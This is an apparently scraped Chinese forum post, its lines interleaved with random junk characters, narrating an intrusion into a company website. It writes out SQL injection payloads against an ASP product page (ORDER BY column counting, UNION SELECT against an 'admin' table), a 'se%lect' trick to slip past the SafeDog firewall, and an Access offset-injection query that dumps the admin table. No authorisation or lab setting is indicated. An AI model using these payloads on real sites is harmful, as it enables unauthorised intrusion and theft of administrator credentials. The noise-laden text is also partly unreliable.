打开网站,一个企业站。' K" R8 a6 v7 p
$ n- {8 c- ^" x' \2 o% ]; V
# r- r1 |( m0 s+ C顺手加个admin
$ C$ r3 Q2 z+ L% k4 E- p
! o4 X* ^# M+ V( s. }' M, G; R. I2 b' @! |4 J% v( K2 Z" R& }6 y
默认后台。
" J/ Y3 ^% S) X, m2 w6 Z9 n0 X回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
8 V, r! }, @ t0 ^% H
5 r+ e8 h& y; \! V
* \% E4 ^7 W) ?7 U) m# i, f
/ k; U8 I# X3 R0 V: K所以就不用御剑扫了,待会直接封IP。
' ?) H; e* v, B$ {: ?$ Y1 g
/ r2 j. \4 g" X" B- T用order by语句判断是否存在注入。; N. S9 M* A+ j% J- V t
http://www.xxx.com /product_show.asp?id=997 order by 1
9 [/ Y0 I- U6 X/ y! F: }; h3 `' Rhttp://www.xxx.com /product_show.asp?id=997 order by 100! H8 u7 B% z, E+ P' O
现在存在注入,经测试后发现是9个字段。
; h0 Q# X) n0 K( o) ^) Z7 A8 U
& B* ` g. O' h0 @7 ~: I9 N接下来进行联合查询,猜是否存在admin表。8 k. e3 Z6 z1 O7 @& Q$ u9 [
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。% f2 A# D9 A, _# Z) z' ~& a$ `
) x# |9 t( X4 |; r
0 ^& _5 d$ \9 g/ t/ h) S! K/ J3 g& x" \1 s3 }
在select中间加个%,se%lect绕过安全狗。
' T z# P% O( Z: {! d* [+ n y0 k7 G+ ~
5 O7 D! V- c1 s
发现存在admin表,然后开始手工猜常用的字段。: h2 p0 j! p2 @& L; U/ v. |
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
5 v- e! R1 q; \- x ! B- x0 C8 m H8 o
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
6 w$ a. U6 u. P+ K2 ~" k8 k
' j1 D% K" e/ ~4 {科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
7 S# M1 z; f8 M) qhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin+ f$ V7 g8 b1 o; W k+ P1 c( j
好了,敏感内容出显了。
" n- p4 `. t) z/ Y/ ?/ f" n4 K* G! Q
# Y1 D5 _7 v' W% Q6 y$ N
3 Q8 y8 V9 c6 E6 O8 V4 x4 Z |